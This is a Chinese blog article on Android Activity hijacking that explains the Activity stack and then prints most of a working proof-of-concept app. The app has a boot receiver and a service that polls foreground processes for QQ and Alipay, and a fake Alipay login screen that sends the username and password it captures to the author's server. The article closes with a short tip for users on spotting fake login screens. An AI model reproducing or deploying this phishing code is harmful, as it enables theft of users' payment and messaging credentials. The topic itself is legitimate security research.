大谈android安全1——Activity劫持与用户防范

移动开发
当AmS收到要启动或停止Activity的消息时,它先更新内部记录,再通知相应的进程运行或停止指定的Activity。当新的Activity启动,前一个Activity就会停止,这些Activity都保留在系统中的一个Activity历史栈中。

1、Activity调度机制

 

在android系统中,不同的程序之间的切换基本上是无缝的,它们之间的切换只不过是Activity的切换。Activity的概念相当于一个与用户交互的界面。而Activity的调度是交由Android系统中的AmS管理的。AmS即ActivityManagerService(Activity管理服务),各个应用想启动或停止一个进程,都是先报告给AmS。

 

当AmS收到要启动或停止Activity的消息时,它先更新内部记录,再通知相应的进程运行或停止指定的Activity。当新的Activity启动,前一个Activity就会停止,这些Activity都保留在系统中的一个Activity历史栈中。每有一个Activity启动,它就压入历史栈顶,并在手机上显示。当用户按下back键时,顶部Activity弹出,恢复前一个Activity,栈顶指向当前的Activity。

 

2、Android设计上的缺陷——Activity劫持

 

如果在启动一个Activity时,给它加入一个标志位FLAG_ACTIVITY_NEW_TASK,就能使它置于栈顶并立马呈现给用户。

 

<img class="alignnone size-full wp-image-621" title="Activity劫持 演示文档" src="http://msdxblog-wordpress.stor.sinaapp.com/uploads/2012/08/Activity劫持-演示文档.png" alt="" width="960" height="720" />

 

但是这样的设计却有一个缺陷。如果这个Activity是用于盗号的伪装Activity呢?

 

在Android系统当中,程序可以枚举当前运行的进程而不需要声明其他权限,这样子我们就可以写一个程序,启动一个后台的服务,这个服务不断地扫描当前运行的进程,当发现目标进程启动时,就启动一个伪装的Activity。如果这个Activity是登录界面,那么就可以从中获取用户的账号密码。

 

3、示例

 

下面是示例代码。

 

AndroidManifest.xml文件的代码。

 

 

  1.  <?xml version="1.0" encoding="utf-8"?> 
  2. <manifest xmlns:android="http://schemas.android.com/apk/res/android" 
  3. package="com.sinaapp.msdxblog.android.activityhijacking" 
  4. android:versionCode="1" 
  5. android:versionName="1.0" > 
  6. <uses-sdk android:minSdkVersion="4" /> 
  7. <uses-permission android:name="android.permission.INTERNET" /> 
  8. <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> 
  9. <application 
  10. android:name=".HijackingApplication" 
  11. android:icon="@drawable/icon" 
  12. android:label="@string/app_name" > 
  13. <activity 
  14. android:name=".activity.HijackingActivity" 
  15. android:theme="@style/transparent" 
  16. android:label="@string/app_name" > 
  17. <intent-filter> 
  18. <action android:name="android.intent.action.MAIN" /> 
  19. <category android:name="android.intent.category.LAUNCHER" /> 
  20. </intent-filter> 
  21. </activity> 
  22. <activity android:name=".activity.sadstories.JokeActivity" /> 
  23. <activity android:name=".activity.sadstories.QQStoryActivity" /> 
  24. <activity android:name=".activity.sadstories.AlipayStoryActivity" /> 
  25. <receiver 
  26. android:name=".receiver.HijackingReceiver" 
  27. android:enabled="true" 
  28. android:exported="true" > 
  29. <intent-filter> 
  30. <action android:name="android.intent.action.BOOT_COMPLETED" /> 
  31. </intent-filter> 
  32. </receiver> 
  33. <service android:name=".service.HijackingService" > 
  34. </service> 
  35. </application> 
  36. </manifest> 
  37.  
  38. 在以上的代码中,声明了一个服务service,用于枚举当前运行的进程。其中如果不想开机启动的话,甚至可以把以上receiver部分的代码,及声明开机启动的权限的这一行代码 <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />去掉,仅仅需要访问网络的权限(向外发送获取到的账号密码),单从AndroidManifest文件是看不出任何异常的。 
  39.  
  40. 下面是正常的Activity的代码。在这里只是启动用于Activity劫持的服务。如果在上面的代码中已经声明了开机启动,则这一步也可以省略。 
  41. Java代码 复制代码 收藏代码 
  42.  
  43. package com.sinaapp.msdxblog.android.activityhijacking.activity; 
  44. import android.app.Activity; 
  45. import android.content.Intent; 
  46. import android.os.Bundle; 
  47. import android.util.Log; 
  48. import com.sinaapp.msdxblog.android.activityhijacking.R; 
  49. import com.sinaapp.msdxblog.android.activityhijacking.service.HijackingService; 
  50. public class HijackingActivity extends Activity { 
  51. /** Called when the activity is first created. */ 
  52. @Override 
  53. public void onCreate(Bundle savedInstanceState) { 
  54. super.onCreate(savedInstanceState); 
  55. setContentView(R.layout.main); 
  56. Intent intent2 = new Intent(this, HijackingService.class); 
  57. startService(intent2); 
  58. Log.w("hijacking", "activity启动用来劫持的Service"); 
  59.  
  60. 如果想要开机启动,则需要一个receiver,即广播接收器,在开机时得到开机启动的广播,并在这里启动服务。如果没有开机启动(这跟上面至少要实现一处,不然服务就没有被启动了),则这一步可以省略。 
  61. Java代码 复制代码 收藏代码 
  62.  
  63. /* 
  64. * @(#)HijackingBroadcast.java Project:ActivityHijackingDemo 
  65. * Date:2012-6-7 
  66. * Copyright (c) 2011 CFuture09, Institute of Software, 
  67. * Guangdong Ocean University, Zhanjiang, GuangDong, China. 
  68. * All rights reserved. 
  69. * Licensed under the Apache License, Version 2.0 (the "License"); 
  70. * you may not use this file except in compliance with the License. 
  71. * You may obtain a copy of the License at 
  72. * http://www.apache.org/licenses/LICENSE-2.0 
  73. * Unless required by applicable law or agreed to in writing, software 
  74. * distributed under the License is distributed on an "AS IS" BASIS, 
  75. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
  76. * See the License for the specific language governing permissions and 
  77. * limitations under the License. 
  78. */ 
  79. package com.sinaapp.msdxblog.android.activityhijacking.receiver; 
  80. import com.sinaapp.msdxblog.android.activityhijacking.service.HijackingService; 
  81. import android.content.BroadcastReceiver; 
  82. import android.content.Context; 
  83. import android.content.Intent; 
  84. import android.util.Log; 
  85. /** 
  86. * @author Geek_Soledad (66704238@51uc.com) 
  87. */ 
  88. public class HijackingReceiver extends BroadcastReceiver { 
  89. @Override 
  90. public void onReceive(Context context, Intent intent) { 
  91. if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) { 
  92. Log.w("hijacking", "开机启动"); 
  93. Intent intent2 = new Intent(context, HijackingService.class); 
  94. context.startService(intent2); 
  95. Log.w("hijacking", "启动用来劫持的Service"); 
  96.  
  97. 下面这个HijackingService类可就关键了,即用来进行Activity劫持的。 
  98. 在这里,将运行枚举当前运行的进程,发现目标进程,弹出伪装程序。 
  99. 代码如下: 
  100. Java代码 复制代码 收藏代码 
  101.  
  102. /* 
  103. * @(#)HijackingService.java Project:ActivityHijackingDemo 
  104. * Date:2012-6-7 
  105. * Copyright (c) 2011 CFuture09, Institute of Software, 
  106. * Guangdong Ocean University, Zhanjiang, GuangDong, China. 
  107. * All rights reserved. 
  108. * Licensed under the Apache License, Version 2.0 (the "License"); 
  109. * you may not use this file except in compliance with the License. 
  110. * You may obtain a copy of the License at 
  111. * http://www.apache.org/licenses/LICENSE-2.0 
  112. * Unless required by applicable law or agreed to in writing, software 
  113. * distributed under the License is distributed on an "AS IS" BASIS, 
  114. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
  115. * See the License for the specific language governing permissions and 
  116. * limitations under the License. 
  117. */ 
  118. package com.sinaapp.msdxblog.android.activityhijacking.service; 
  119. import java.util.HashMap; 
  120. import java.util.List; 
  121. import android.app.ActivityManager; 
  122. import android.app.ActivityManager.RunningAppProcessInfo; 
  123. import android.app.Service; 
  124. import android.content.Context; 
  125. import android.content.Intent; 
  126. import android.os.Handler; 
  127. import android.os.IBinder; 
  128. import android.util.Log; 
  129. import com.sinaapp.msdxblog.android.activityhijacking.HijackingApplication; 
  130. import com.sinaapp.msdxblog.android.activityhijacking.activity.sadstories.AlipayStoryActivity; 
  131. import com.sinaapp.msdxblog.android.activityhijacking.activity.sadstories.JokeActivity; 
  132. import com.sinaapp.msdxblog.android.activityhijacking.activity.sadstories.QQStoryActivity; 
  133. /** 
  134. * @author Geek_Soledad (66704238@51uc.com) 
  135. */ 
  136. public class HijackingService extends Service { 
  137. private boolean hasStart = false
  138. // 这是一个悲伤的故事…… 
  139. HashMap<String, Class<?>> mSadStories = new HashMap<String, Class<?>>(); 
  140. // Timer mTimer = new Timer(); 
  141. Handler handler = new Handler(); 
  142. Runnable mTask = new Runnable() { 
  143. @Override 
  144. public void run() { 
  145. ActivityManager activityManager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE); 
  146. List<RunningAppProcessInfo> appProcessInfos = activityManager 
  147. .getRunningAppProcesses(); 
  148. // 枚举进程 
  149. Log.w("hijacking", "正在枚举进程"); 
  150. for (RunningAppProcessInfo appProcessInfo : appProcessInfos) { 
  151. // 如果APP在前台,那么——悲伤的故事就要来了 
  152. if (appProcessInfo.importance == RunningAppProcessInfo.IMPORTANCE_FOREGROUND) { 
  153. if (mSadStories.containsKey(appProcessInfo.processName)) { 
  154. // 进行劫持 
  155. hijacking(appProcessInfo.processName); 
  156. } else { 
  157. Log.w("hijacking", appProcessInfo.processName); 
  158. handler.postDelayed(mTask, 1000); 
  159. /** 
  160. * 进行劫持 
  161. * @param processName 
  162. */ 
  163. private void hijacking(String processName) { 
  164. Log.w("hijacking", "有程序要悲剧了……"); 
  165. if (((HijackingApplication) getApplication()) 
  166. .hasProgressBeHijacked(processName) == false) { 
  167. Log.w("hijacking", "悲剧正在发生"); 
  168. Intent jackingIsComing = new Intent(getBaseContext(), 
  169. mSadStories.get(processName)); 
  170. jackingIsComing.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); 
  171. getApplication().startActivity(jackingIsComing); 
  172. ((HijackingApplication) getApplication()) 
  173. .addProgressHijacked(processName); 
  174. Log.w("hijacking", "已经劫持"); 
  175. }; 
  176. @Override 
  177. public IBinder onBind(Intent intent) { 
  178. return null; 
  179. @Override 
  180. public void onStart(Intent intent, int startId) { 
  181. super.onStart(intent, startId); 
  182. if (!hasStart) { 
  183. mSadStories.put("com.sinaapp.msdxblog.android.lol", 
  184. JokeActivity.class); 
  185. mSadStories.put("com.tencent.mobileqq", QQStoryActivity.class); 
  186. mSadStories.put("com.eg.android.AlipayGphone", 
  187. AlipayStoryActivity.class); 
  188. handler.postDelayed(mTask, 1000); 
  189. hasStart = true
  190. @Override 
  191. public boolean stopService(Intent name) { 
  192. hasStart = false
  193. Log.w("hijacking", "劫持服务停止"); 
  194. ((HijackingApplication) getApplication()).clearProgressHijacked(); 
  195. return super.stopService(name); 
  196.  
  197. 下面是支付宝的伪装类(布局文件就不写了,这个是对老版本的支付宝界面的伪装,新的支付宝登录界面已经完全不一样了。表示老版本的支付宝的界面相当蛋疼,读从它反编译出来的代码苦逼地读了整个通宵结果还是没读明白。它的登录界面各种布局蛋疼地嵌套了十层,而我为了实现跟它一样的效果也蛋疼地嵌套了八层的组件)。 
  198. Java代码 复制代码 收藏代码 
  199.  
  200. /* 
  201. * @(#)QQStoryActivity.java Project:ActivityHijackingDemo 
  202. * Date:2012-6-7 
  203. * Copyright (c) 2011 CFuture09, Institute of Software, 
  204. * Guangdong Ocean University, Zhanjiang, GuangDong, China. 
  205. * All rights reserved. 
  206. * Licensed under the Apache License, Version 2.0 (the "License"); 
  207. * you may not use this file except in compliance with the License. 
  208. * You may obtain a copy of the License at 
  209. * http://www.apache.org/licenses/LICENSE-2.0 
  210. * Unless required by applicable law or agreed to in writing, software 
  211. * distributed under the License is distributed on an "AS IS" BASIS, 
  212. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
  213. * See the License for the specific language governing permissions and 
  214. * limitations under the License. 
  215. */ 
  216. package com.sinaapp.msdxblog.android.activityhijacking.activity.sadstories; 
  217. import android.app.Activity; 
  218. import android.os.Bundle; 
  219. import android.os.Handler; 
  220. import android.os.HandlerThread; 
  221. import android.text.Html; 
  222. import android.view.View; 
  223. import android.widget.Button; 
  224. import android.widget.EditText; 
  225. import android.widget.TextView; 
  226. import com.sinaapp.msdxblog.android.activityhijacking.R; 
  227. import com.sinaapp.msdxblog.android.activityhijacking.utils.SendUtil; 
  228. /** 
  229. * @author Geek_Soledad (66704238@51uc.com) 
  230. */ 
  231. public class AlipayStoryActivity extends Activity { 
  232. private EditText name; 
  233. private EditText password; 
  234. private Button mBtAlipay; 
  235. private Button mBtTaobao; 
  236. private Button mBtRegister; 
  237. private TextView mTvFindpswd; 
  238. @Override 
  239. protected void onCreate(Bundle savedInstanceState) { 
  240. super.onCreate(savedInstanceState); 
  241. this.setTheme(android.R.style.Theme_NoTitleBar); 
  242. setContentView(R.layout.alipay); 
  243. mBtAlipay = (Button) findViewById(R.id.alipay_bt_alipay); 
  244. mBtTaobao = (Button) findViewById(R.id.alipay_bt_taobao); 
  245. mBtRegister = (Button) findViewById(R.id.alipay_bt_register); 
  246. mTvFindpswd = (TextView) findViewById(R.id.alipay_findpswd); 
  247. mTvFindpswd.setText(Html.fromHtml("[u]找回登录密码[/u]")); 
  248. mBtAlipay.setSelected(true); 
  249. name = (EditText) findViewById(R.id.input_name); 
  250. password = (EditText) findViewById(R.id.input_password); 
  251. public void onButtonClicked(View v) { 
  252. switch (v.getId()) { 
  253. case R.id.alipay_bt_login: 
  254. HandlerThread handlerThread = new HandlerThread("send"); 
  255. handlerThread.start(); 
  256. new Handler(handlerThread.getLooper()).post(new Runnable() { 
  257. @Override 
  258. public void run() { 
  259. // 发送获取到的用户密码 
  260. SendUtil.sendInfo(name.getText().toString(), password 
  261. .getText().toString(), "支付宝"); 
  262. }); 
  263. moveTaskToBack(true); 
  264. break; 
  265. case R.id.alipay_bt_alipay: 
  266. chooseToAlipay(); 
  267. break; 
  268. case R.id.alipay_bt_taobao: 
  269. chooseToTaobao(); 
  270. break; 
  271. default: 
  272. break; 
  273. private void chooseToAlipay() { 
  274. mBtAlipay.setSelected(true); 
  275. mBtTaobao.setSelected(false); 
  276. name.setHint(R.string.alipay_name_alipay_hint); 
  277. mTvFindpswd.setVisibility(View.VISIBLE); 
  278. mBtRegister.setVisibility(View.VISIBLE); 
  279. private void chooseToTaobao() { 
  280. mBtAlipay.setSelected(false); 
  281. mBtTaobao.setSelected(true); 
  282. name.setHint(R.string.alipay_name_taobao_hint); 
  283. mTvFindpswd.setVisibility(View.GONE); 
  284. mBtRegister.setVisibility(View.GONE); 
  285. }  

 

 

 

上面的其他代码主要是为了让界面的点击效果与真的支付宝看起来尽量一样。主要的代码是发送用户密码的那一句。

 

至于SendUtil我就不提供了,它是向我写的服务器端发送一个HTTP请求,将用户密码发送出去。

 

4、用户防范

 

这里我将说下我发现的防范的方法,非常简单。这个方法是对用户而言的。android手机均有一个HOME键(即小房子的那个图标),长按可以看到近期任务(前几天发现一个奇葩的手机,居然是短按一个键的,而这个键长按时是弹出MENU菜单,太奇葩了)。对于我所用的HTC G14而言,显示的最近的一个是上一个运行的程序。小米显示的最近的一个是当前运行的程序。所以,在要输入密码进行登录时,可以通过长按HOME键查看近期任务,以我的手机为例,如果在登录QQ时长按发现近期任务出现了QQ,则我现在的这个登录界面就极有可能是伪装了,切换到另一个程序,再查看近期任务,就可以知道这个登录界面是来源于哪个程序了。

 

如果是小米手机的话,在进行登录时,如果查看的近期任务的第一个不是自己要登录的那个程序的名字,则它就是伪装的。

 

目前对于这种Activity劫持,没有发现有任何手机查杀软件可以主动防范。而我所知的,也只有我发现的这一方法可以判别。如果有新的消息,欢迎参加讨论。

责任编辑:chenqingxiang 来源: 360图书馆
相关推荐

2015-11-09 14:37:45

Android安全

2012-02-17 17:07:30

Android安全Activity劫持

2014-07-22 13:52:45

2010-09-09 22:41:18

2017-03-23 09:13:56

2012-12-25 13:45:37

2017-03-15 10:00:15

2015-11-09 14:46:49

Android安全

2010-12-15 17:19:34

2013-05-20 10:20:02

2023-12-20 14:42:59

2020-07-15 09:42:35

金融安全3.0安全风险剖析

2009-07-05 11:27:09

2022-07-04 09:00:00

帐户劫持信息安全攻击

2016-10-10 13:51:42

2014-05-27 14:09:52

AndroidActivitysingleTask

2011-07-30 13:35:00

2011-07-19 09:11:30

2021-12-02 15:07:41

基于远程桌面协议RDP安全威胁
点赞
收藏

51CTO技术栈公众号